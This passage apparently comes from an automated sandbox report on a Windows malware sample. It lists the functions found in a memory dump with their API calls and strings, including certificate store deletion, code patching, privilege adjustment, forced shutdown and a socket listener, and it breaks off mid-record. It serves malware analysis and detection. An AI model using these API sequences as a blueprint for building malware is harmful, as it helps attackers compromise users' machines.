Part of subcall function 00155AD5: GetLastError.KERNEL32(?,0014BA1E), ref: 00155AD6
Part of subcall function 00155AD5: TlsSetValue.KERNEL32(00000000), ref: 00155AE6
Part of subcall function 00155AD5: SetLastError.KERNEL32(?,?,0014BA1E), ref: 00155AED

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014C77A, Relevance: 7.6, APIs: 6, Instructions: 61

APIs

Part of subcall function 0014F1A8: EnterCriticalSection.KERNEL32(00183510,?,0014C78E,?,?,?,00000001,00164DE8,00000001), ref: 0014F1B8
Part of subcall function 0014F1A8: LeaveCriticalSection.KERNEL32(00183510,?,0014C78E,?,?,?,00000001,00164DE8,00000001), ref: 0014F1E2

memset.MSVCRT ref: 0014C7BC
memset.MSVCRT ref: 0014C7C8
memset.MSVCRT ref: 0014C7D4
InitializeCriticalSection.KERNEL32 ref: 0014C7EC
InitializeCriticalSection.KERNEL32 ref: 0014C807
InitializeCriticalSection.KERNEL32 ref: 0014C844

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016071B, Relevance: 7.5, APIs: 5, Instructions: 43

APIs

CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 00160734
CertDuplicateCertificateContext.CRYPT32(?,?,00000000), ref: 00160745
CertDeleteCertificateFromStore.CRYPT32(?,?,?,00000000), ref: 00160750
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00160758
CertCloseStore.CRYPT32(?,00000000,?,00000000), ref: 00160766

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014DB89, Relevance: 7.5, APIs: 5, Instructions: 28

APIs

SetEvent.KERNEL32(?), ref: 0014DB95
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0014DBA6
CloseHandle.KERNEL32(?), ref: 0014DBAF
CloseHandle.KERNEL32(?), ref: 0014DBBE

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

DeleteCriticalSection.KERNEL32(00C027A8,?,0014DB81,00C027A8), ref: 0014DBD5

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001610E0, Relevance: 7.5, APIs: 4, Instructions: 113

APIs

Part of subcall function 00160D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00160D60

RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0016113B
RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001611A5
RegFlushKey.ADVAPI32(00000000), ref: 001611D3
RegCloseKey.ADVAPI32(00000000), ref: 001611DA

Part of subcall function 00161051: EnterCriticalSection.KERNEL32(00183510,?,?,00000000,001611FB,?,?,?,7C809C98,00000014,00000000), ref: 00161067
Part of subcall function 00161051: LeaveCriticalSection.KERNEL32(00183510,?,?,00000000,001611FB,?,?,?,7C809C98,00000014,00000000), ref: 0016108F
Part of subcall function 00161051: GetModuleHandleW.KERNEL32(advapi32.dll), ref: 001610AB
Part of subcall function 00161051: GetProcAddress.KERNEL32 ref: 001610B2
Part of subcall function 00161051: RegDeleteKeyW.ADVAPI32(?,?), ref: 001610D4

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

Part of subcall function 00160D19: RegFlushKey.ADVAPI32 ref: 00160D29
Part of subcall function 00160D19: RegCloseKey.ADVAPI32 ref: 00160D31

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00159F57, Relevance: 7.4, APIs: 4, Instructions: 87

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,?,0014B41A,?), ref: 00159F69

Part of subcall function 001707B1: CoCreateInstance.OLE32(001417F8,00000000,00004401,00141858,?), ref: 001707C6

#2.OLEAUT32(0014B41A,00000000,?,?,?,0014B41A,?), ref: 00159F9D
#6.OLEAUT32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,0014B41A,?), ref: 00159FD2
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00159FF2

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016575A, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 68

APIs

memset.MSVCRT ref: 00165774

Part of subcall function 0016BAD3: memcpy.MSVCRT ref: 0016BAEE
Part of subcall function 0016BAD3: StringFromGUID2.OLE32(?), ref: 0016BB92

Part of subcall function 00149F72: memcpy.MSVCRT ref: 00149F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 001657BA

Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016439E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI ref: 001643A8
Part of subcall function 0016432D: memcpy.MSVCRT ref: 001643F1
Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016441E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

Strings

Software\Microsoft\Yfosteyq, xrefs: 0016576E 00165773 001657FB
Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}, xrefs: 0016577F

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00156E19, Relevance: 7.4, APIs: 4, Instructions: 57

APIs

memcpy.MSVCRT ref: 00156E41
memcpy.MSVCRT ref: 00156E5E
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00156E74
WSASetLastError.WS2_32(0000274C), ref: 00156E83

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00172BF3, Relevance: 7.4, APIs: 4, Instructions: 54

APIs

Part of subcall function 001727C1: socket.WS2_32(?,?,00000006), ref: 001727F5

bind.WS2_32(?,00172CD1), ref: 00172C3A
listen.WS2_32(?,00000014), ref: 00172C4F
WSAGetLastError.WS2_32(00000000,?,00172CD1,?,?,?,?,00000000), ref: 00172C5D

Part of subcall function 00172968: shutdown.WS2_32(?,00000002), ref: 00172976
Part of subcall function 00172968: closesocket.WS2_32(?), ref: 0017297F
Part of subcall function 00172968: WSACloseEvent.WS2_32(?), ref: 00172992

WSASetLastError.WS2_32(?,?,00172CD1,?,?,?,?,00000000), ref: 00172C6D

Part of subcall function 00172917: WSACreateEvent.WS2_32(00000000,?,00172C15,?,00000000,?,00172CD1,?,?,?,?,00000000), ref: 0017292D
Part of subcall function 00172917: WSAEventSelect.WS2_32(?,?,00172CD1), ref: 00172943
Part of subcall function 00172917: WSACloseEvent.WS2_32(?), ref: 00172957

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014CBBC, Relevance: 7.3, APIs: 4, Instructions: 139

APIs

Part of subcall function 0014F1EF: memcmp.MSVCRT ref: 0014F1FB

Part of subcall function 0014F20B: memset.MSVCRT ref: 0014F219
Part of subcall function 0014F20B: memcpy.MSVCRT ref: 0014F23A
Part of subcall function 0014F20B: memcpy.MSVCRT ref: 0014F260
Part of subcall function 0014F20B: memcpy.MSVCRT ref: 0014F284

TryEnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,0014D203,?,?,00000000,?,?,?,?,00000000,0000EA60), ref: 0014CC39

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,0014D203,?,?,00000000,?), ref: 0014CCB3
EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,0014D203,?,?,00000000,?), ref: 0014CCD2

Part of subcall function 0014F0E1: memcmp.MSVCRT ref: 0014F0FD

LeaveCriticalSection.KERNEL32(?,?,00000001,?,?,?,?,00000000,?,?,?,?,0014D203,?,?,00000000), ref: 0014CD20

Part of subcall function 0014EEE2: memcpy.MSVCRT ref: 0014EFC1
Part of subcall function 0014EEE2: memcpy.MSVCRT ref: 0014EFE2

Part of subcall function 0016D95F: GetSystemTime.KERNEL32(?), ref: 0016D969

Part of subcall function 0014EDAE: memcpy.MSVCRT ref: 0014EDF9

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015258C, Relevance: 7.3, APIs: 4, Instructions: 120

APIs

GetUserNameExW.SECUR32(00000002,?,?,00000001,?,00000000), ref: 001525BA
GetSystemTime.KERNEL32(?), ref: 0015260D
CharLowerW.USER32(?), ref: 0015265D
PathRenameExtensionW.SHLWAPI(?,?), ref: 0015268D

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00174D77, Relevance: 7.3, APIs: 4, Instructions: 111

APIs

Part of subcall function 00174B12: EnterCriticalSection.KERNEL32(00183510,00C01E90,00174D87,?,00C01E90), ref: 00174B22
Part of subcall function 00174B12: LeaveCriticalSection.KERNEL32(00183510,?,00C01E90), ref: 00174B51

Part of subcall function 0014D2F7: VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?), ref: 0014D315
Part of subcall function 0014D2F7: VerQueryValueW.VERSION(?,?,?,?), ref: 0014D382

GetCommandLineW.KERNEL32 ref: 00174E01
CommandLineToArgvW.SHELL32 ref: 00174E08
LocalFree.KERNEL32 ref: 00174E48

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

GetModuleHandleW.KERNEL32(?), ref: 00174E8A

Part of subcall function 0017509F: PathFindFileNameW.SHLWAPI(00000000), ref: 001750E0

Part of subcall function 00157D68: InitializeCriticalSection.KERNEL32 ref: 00157D88

Part of subcall function 00173C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00173C98
Part of subcall function 00173C83: StrCmpIW.SHLWAPI(?,?), ref: 00173CA2

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014C5FE, Relevance: 7.3, APIs: 4, Instructions: 104

APIs

EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,?,?,0014D203,?,?,00000000,?,?,?,?,00000000), ref: 0014C631

Part of subcall function 0016D0A9: WaitForSingleObject.KERNEL32(?,00000000), ref: 0016D0B5

memcmp.MSVCRT ref: 0014C67F

Part of subcall function 001532C5: memcpy.MSVCRT ref: 001532FB
Part of subcall function 001532C5: memcpy.MSVCRT ref: 0015330F
Part of subcall function 001532C5: memset.MSVCRT ref: 0015331D

SetEvent.KERNEL32 ref: 0014C6C0

Part of subcall function 0014F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0014F82D

LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,?,?,0014D203,?,?,00000000,?), ref: 0014C6ED

Part of subcall function 00171E96: EnterCriticalSection.KERNEL32(?,?,?,?,0014CAC8,?,?,00000000,?,?,?,00000000,0000EA60), ref: 00171E9C
Part of subcall function 00171E96: memcmp.MSVCRT ref: 00171EC8
Part of subcall function 00171E96: memcpy.MSVCRT ref: 00171F13
Part of subcall function 00171E96: LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,00000000,0000EA60), ref: 00171F1F

Part of subcall function 0014CBBC: TryEnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,0014D203,?,?,00000000,?,?,?,?,00000000,0000EA60), ref: 0014CC39
Part of subcall function 0014CBBC: LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,0014D203,?,?,00000000,?), ref: 0014CCB3
Part of subcall function 0014CBBC: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,0014D203,?,?,00000000,?), ref: 0014CCD2
Part of subcall function 0014CBBC: LeaveCriticalSection.KERNEL32(?,?,00000001,?,?,?,?,00000000,?,?,?,?,0014D203,?,?,00000000), ref: 0014CD20

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016AF4A, Relevance: 7.3, APIs: 4, Instructions: 91

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002,0017F128), ref: 0016AF7C
DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002), ref: 0016AF9C

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

Part of subcall function 00165C1C: memset.MSVCRT ref: 00165C5F

Part of subcall function 00149F72: memcpy.MSVCRT ref: 00149F80

Part of subcall function 0014A150: memcpy.MSVCRT ref: 0014A18C
Part of subcall function 0014A150: memcpy.MSVCRT ref: 0014A1A1
Part of subcall function 0014A150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000001DE,00000104), ref: 0014A1D3
Part of subcall function 0014A150: memcpy.MSVCRT ref: 0014A209
Part of subcall function 0014A150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000003FA,00000104), ref: 0014A239
Part of subcall function 0014A150: memcpy.MSVCRT ref: 0014A26F
Part of subcall function 0014A150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000616,00000104), ref: 0014A29F

memset.MSVCRT ref: 0016B039
memcpy.MSVCRT ref: 0016B04B

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001519E0, Relevance: 7.2, APIs: 4, Instructions: 70

APIs

EnterCriticalSection.KERNEL32(00C01E90), ref: 001519EE

Part of subcall function 0015353D: EnterCriticalSection.KERNEL32(00183510,00C01E90,0015376F,?,?,?,?,?,0015191E,?,?,?,?,001648EB), ref: 0015354D
Part of subcall function 0015353D: LeaveCriticalSection.KERNEL32(00183510,?,?,?,?,?,0015191E,?,?,?,?,001648EB,?,?,00000000), ref: 00153575

PathFindFileNameW.SHLWAPI(?), ref: 00151A21

Part of subcall function 0015357D: VirtualProtect.KERNEL32(?,001537D4,00000080,?), ref: 001535ED
Part of subcall function 0015357D: GetCurrentThread.KERNEL32 ref: 001536AC
Part of subcall function 0015357D: GetThreadPriority.KERNEL32 ref: 001536B5
Part of subcall function 0015357D: SetThreadPriority.KERNEL32(?,0000000F), ref: 001536C6
Part of subcall function 0015357D: Sleep.KERNEL32(00000000), ref: 001536CA
Part of subcall function 0015357D: memcpy.MSVCRT ref: 001536D9
Part of subcall function 0015357D: FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 001536EA
Part of subcall function 0015357D: SetThreadPriority.KERNEL32 ref: 001536F2
Part of subcall function 0015357D: GetTickCount.KERNEL32 ref: 0015370D
Part of subcall function 0015357D: GetTickCount.KERNEL32 ref: 0015371A
Part of subcall function 0015357D: Sleep.KERNEL32(00000000), ref: 00153727
Part of subcall function 0015357D: VirtualProtect.KERNEL32(?,001537D4,00000000,?), ref: 00153756

Part of subcall function 0017509F: PathFindFileNameW.SHLWAPI(00000000), ref: 001750E0

LeaveCriticalSection.KERNEL32(00C01E90), ref: 00151A9E

Part of subcall function 0014BC27: PathFindFileNameW.SHLWAPI(00000000), ref: 0014BC6B

Part of subcall function 0015BE32: EnterCriticalSection.KERNEL32(00183510,00C01E90,0015D8CC,?,00151988,?,?,?,?,?,?,001648EB,?,?,00000000), ref: 0015BE42
Part of subcall function 0015BE32: LeaveCriticalSection.KERNEL32(00183510,?,00151988,?,?,?,?,?,?,001648EB,?,?,00000000), ref: 0015BE71

PathFindFileNameW.SHLWAPI(?), ref: 00151A64

Part of subcall function 00173C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00173C98
Part of subcall function 00173C83: StrCmpIW.SHLWAPI(?,?), ref: 00173CA2

Part of subcall function 0014DA34: PathFindFileNameW.SHLWAPI(?), ref: 0014DA53
Part of subcall function 0014DA34: PathRemoveExtensionW.SHLWAPI(?), ref: 0014DA7C

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00159346, Relevance: 7.2, APIs: 4, Instructions: 65

APIs

HttpQueryInfoA.WININET(?,0000FFFF,?,?,?), ref: 00159375
GetLastError.KERNEL32(?,00000000,3D94878D,00000000,3D94878D,0016D67C,?,?,?,?,?,00147900,?,?,?), ref: 0015937B

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

memcpy.MSVCRT ref: 001593A6
HttpQueryInfoA.WININET(?,0000FFFF,?,?,?), ref: 001593BF

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016D0DA, Relevance: 7.2, APIs: 4, Instructions: 61

APIs

Part of subcall function 0017046D: EnterCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 0017047A
Part of subcall function 0017046D: LeaveCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 00170488

QueryPerformanceCounter.KERNEL32(?), ref: 0016D0F9
GetTickCount.KERNEL32 ref: 0016D106

Part of subcall function 0014F1A8: EnterCriticalSection.KERNEL32(00183510,?,0014C78E,?,?,?,00000001,00164DE8,00000001), ref: 0014F1B8
Part of subcall function 0014F1A8: LeaveCriticalSection.KERNEL32(00183510,?,0014C78E,?,?,?,00000001,00164DE8,00000001), ref: 0014F1E2

Part of subcall function 00149A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00149ACA
Part of subcall function 00149A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00149AEF

memset.MSVCRT ref: 0016D15A
memcpy.MSVCRT ref: 0016D16A

Part of subcall function 00149A2A: CryptDestroyHash.ADVAPI32 ref: 00149A42
Part of subcall function 00149A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00149A53

Part of subcall function 00149B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00149B41

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00164461, Relevance: 7.2, APIs: 4, Instructions: 56

APIs

PathSkipRootW.SHLWAPI(?), ref: 0016448B
GetFileAttributesW.KERNEL32(?), ref: 001644B8
CreateDirectoryW.KERNEL32(?,00000000), ref: 001644CC
SetLastError.KERNEL32(00000050), ref: 001644EF

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014A46D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 51

APIs

memset.MSVCRT ref: 0014A47C
memset.MSVCRT ref: 0014A4BF
memset.MSVCRT ref: 0014A4F5

Strings

8, xrefs: 0014A4B3

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0017E290, Relevance: 7.2, APIs: 4, Instructions: 48

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0017EC47
UnhandledExceptionFilter.KERNEL32(00144D1C), ref: 0017EC52
GetCurrentProcess.KERNEL32 ref: 0017EC5D
TerminateProcess.KERNEL32 ref: 0017EC64

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00172155, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133

APIs

Part of subcall function 00163EFF: CharLowerW.USER32(?), ref: 00163FBA

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

ExitWindowsEx.USER32(00000014,80000000), ref: 0017228F
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 001722CF

Part of subcall function 00159C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00159CCE
Part of subcall function 00159C8D: PathRemoveFileSpecW.SHLWAPI(?), ref: 00159D17
Part of subcall function 00159C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00159D3E
Part of subcall function 00159C8D: PathRemoveFileSpecW.SHLWAPI(?), ref: 00159D87
Part of subcall function 00159C8D: SetEvent.KERNEL32 ref: 00159D9A
Part of subcall function 00159C8D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00159DAD
Part of subcall function 00159C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00159DF1
Part of subcall function 00159C8D: CharToOemW.USER32(?,?), ref: 00159E6F
Part of subcall function 00159C8D: CharToOemW.USER32(?,?), ref: 00159E81
Part of subcall function 00159C8D: ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00159EEC

Part of subcall function 0016582C: EnterCriticalSection.KERNEL32(00183510,?,?,?,0015E9BA), ref: 00165842
Part of subcall function 0016582C: LeaveCriticalSection.KERNEL32(00183510,?,?,?,0015E9BA), ref: 00165868
Part of subcall function 0016582C: CreateMutexW.KERNEL32(00182974,00000000,Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}), ref: 0016587A

Part of subcall function 00152FB7: ReleaseMutex.KERNEL32 ref: 00152FBB
Part of subcall function 00152FB7: CloseHandle.KERNEL32 ref: 00152FC2

ExitWindowsEx.USER32(00000014,80000000), ref: 001722E2

Part of subcall function 001550C0: GetCurrentThread.KERNEL32 ref: 001550D4
Part of subcall function 001550C0: OpenThreadToken.ADVAPI32 ref: 001550DB
Part of subcall function 001550C0: GetCurrentProcess.KERNEL32 ref: 001550EB
Part of subcall function 001550C0: OpenProcessToken.ADVAPI32 ref: 001550F2
Part of subcall function 001550C0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00155113
Part of subcall function 001550C0: AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00155128
Part of subcall function 001550C0: GetLastError.KERNEL32 ref: 00155132
Part of subcall function 001550C0: CloseHandle.KERNEL32(00000001), ref: 00155143

Part of subcall function 0016407B: memcpy.MSVCRT ref: 0016409B

Strings

SeShutdownPrivilege, xrefs: 001722B1

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0017299E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51

APIs

shutdown.WS2_32(?,00000001), ref: 001729AC
WSAGetLastError.WS2_32(?,00000001,?,?,?,?,?,?,?,0016FF4F,?,?,?,00002710,?,?), ref: 001729CD
WSASetLastError.WS2_32(00000000,?,00000001), ref: 00172A12

Strings

, xrefs: 001729F3

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001731E5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30

APIs

Part of subcall function 00172755: EnterCriticalSection.KERNEL32(00183510,?,001730AF,?,?,00000000), ref: 00172765
Part of subcall function 00172755: LeaveCriticalSection.KERNEL32(00183510,?,00000000), ref: 0017278F

WSAAddressToStringA.WS2_32(?,?,00000000,?,?), ref: 0017320B
lstrcpyA.KERNEL32(?,0:0,?,00000000,?,?,?,?,?,?,00170029,?,?,?,?), ref: 0017321B

Strings

0, xrefs: 001731FD
0:0, xrefs: 00173215

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00172DBA, Relevance: 6.9, APIs: 2, Strings: 1, Instructions: 63

APIs

WSAGetLastError.WS2_32 ref: 00172DF0
WSASetLastError.WS2_32(00002775), ref: 00172E54

Strings

, xrefs: 00172E18

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00151D27, Relevance: 6.5, APIs: 5, Instructions: 213

APIs

memset.MSVCRT ref: 00151DCD

Part of subcall function 0014F1EF: memcmp.MSVCRT ref: 0014F1FB

Part of subcall function 0014F040: memcmp.MSVCRT ref: 0014F0B6

Part of subcall function 0014EEA9: memcpy.MSVCRT ref: 0014EED2

Part of subcall function 0014EDAE: memcpy.MSVCRT ref: 0014EDF9

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

memset.MSVCRT ref: 00151E71
memcpy.MSVCRT ref: 00151E84
memcpy.MSVCRT ref: 00151EA6
memcpy.MSVCRT ref: 00151EC6

Part of subcall function 0017046D: EnterCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 0017047A
Part of subcall function 0017046D: LeaveCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 00170488

Part of subcall function 0014C907: EnterCriticalSection.KERNEL32(?,?,00000002,00000001,?,00000000,0014CB5E,?), ref: 0014C961
Part of subcall function 0014C907: InterlockedIncrement.KERNEL32 ref: 0014C99E
Part of subcall function 0014C907: SetEvent.KERNEL32 ref: 0014C9BC
Part of subcall function 0014C907: LeaveCriticalSection.KERNEL32(?,?,?,00000002,00000001,?,00000000,0014CB5E,?), ref: 0014C9C9

Part of subcall function 0014F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0014F82D

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014E6AF, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 47

APIs

GetFileAttributesW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data), ref: 0014E6BC
CreateFileW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data,80000000,00000007,00000000,00000003,?,00000000), ref: 0014E6DC

Part of subcall function 0014E348: CloseHandle.KERNEL32 ref: 0014E354

Part of subcall function 0014E5F1: memcpy.MSVCRT ref: 0014E632
Part of subcall function 0014E5F1: memcpy.MSVCRT ref: 0014E645
Part of subcall function 0014E5F1: memcpy.MSVCRT ref: 0014E658
Part of subcall function 0014E5F1: memcpy.MSVCRT ref: 0014E663
Part of subcall function 0014E5F1: GetFileTime.KERNEL32(?,?,?), ref: 0014E687
Part of subcall function 0014E5F1: memcpy.MSVCRT ref: 0014E69D

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 0014E6B2 0014E6B3 0014E6B9 0014E6DB

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001592DF, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 46

APIs

memset.MSVCRT ref: 001592F2
InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00159314

Part of subcall function 001593E9: SetLastError.KERNEL32(00000008,00003A98,?,00000000,00159326,?,?,00000000), ref: 00159412
Part of subcall function 001593E9: memcpy.MSVCRT ref: 00159432
Part of subcall function 001593E9: memcpy.MSVCRT ref: 0015946A
Part of subcall function 001593E9: memcpy.MSVCRT ref: 00159482

Strings

<, xrefs: 0015930D

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001595BE, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 45

APIs

Part of subcall function 00173629: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 0017363C
Part of subcall function 00173629: GetLastError.KERNEL32(?,00155032,?,00000008,?,?,?,?,?,?,001649E1,?,?,00000001), ref: 00173646
Part of subcall function 00173629: GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 0017366E

EqualSid.ADVAPI32(?,5B867A00), ref: 001595E1

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 001552FF: LoadLibraryA.KERNEL32(userenv.dll), ref: 0015530F
Part of subcall function 001552FF: GetProcAddress.KERNEL32(?,CreateEnvironmentBlock), ref: 0015532D
Part of subcall function 001552FF: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00155339
Part of subcall function 001552FF: memset.MSVCRT ref: 00155379
Part of subcall function 001552FF: CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 001553C6
Part of subcall function 001552FF: CloseHandle.KERNEL32(?), ref: 001553DA
Part of subcall function 001552FF: CloseHandle.KERNEL32(?), ref: 001553E0
Part of subcall function 001552FF: FreeLibrary.KERNEL32 ref: 001553F4

CloseHandle.KERNEL32(00000001), ref: 00159628

Strings

"%s", xrefs: 001595F5

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001667C9, Relevance: 6.4, APIs: 5, Instructions: 160

APIs

